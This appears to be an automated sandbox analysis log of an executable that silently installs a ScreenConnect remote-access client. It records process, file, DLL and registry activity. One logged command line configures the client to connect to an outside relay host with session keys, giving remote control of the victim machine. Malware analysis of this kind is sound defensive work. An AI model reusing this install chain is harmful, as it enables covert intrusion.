                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIE7EB.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIEC9F.tmp
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5de52d.msi
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{C65824D8-9903-AFB4-B430-141024FF968F}
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\{C65824D8-9903-AFB4-B430-141024FF968F}\DefaultIcon
                              Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Windows\Installer\wix{C65824D8-9903-AFB4-B430-141024FF968F}.SchedServiceConfig.rmi
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\2lempn5l.tmp
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\2lempn5l.newcfg
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                              Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSIE7EB.tmp
                              Source: file.exe Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: file.exe Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: file.exe Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenamelibwebp.dllB vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenamezlib.dll2 vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenameSfxCA.dllL vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenamewixca.dll\ vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs file.exe
                              Source: file.exe Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs file.exe
                              Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.0.file.exe.a263d8.4.raw.unpack, CursorBuffer.cs Cryptographic APIs: 'TransformBlock'
                              Source: 0.2.file.exe.5800000.4.raw.unpack, WindowsToolkit.cs Cryptographic APIs: 'CreateDecryptor'
                              Source: 0.2.file.exe.5670000.2.raw.unpack, CursorBuffer.cs Cryptographic APIs: 'TransformBlock'
                              Source: classification engine Classification label: mal48.evad.winEXE@17/56@1/1
                              Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)
                              Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Mutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\ScreenConnect
                              Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE114.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6152593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: file.exe Virustotal: Detection: 26%
                              Source: file.exe String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: file.exe String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe
                              Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                              Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                              Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A716AADF688D387F4AEB51767417B70D C
                              Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIE114.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6152593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 62F8343635E97A7D5BEDC1A49E3625BE
                              Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3CDFD6ECE8056A2339D8E63B556C7FE0 E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kasin22.zapto.org&p=8041&s=87beefcf-9aa1-4c84-85bf-0153032d6d5b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&c=Traffic%20Test&c=&c=&c=&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "60081e8a-4d58-45ec-97b7-8f04b030d7f4" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Process created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "355be41b-df8e-4504-845b-0f4583aafa5e" "System"
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                              Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                              Source: file.exe | Static PE information: certificate valid
                              Source: file.exe | Static file information: File size 5635656 > 1048576
                              Source: file.exe | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2249568704.000000001B9E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
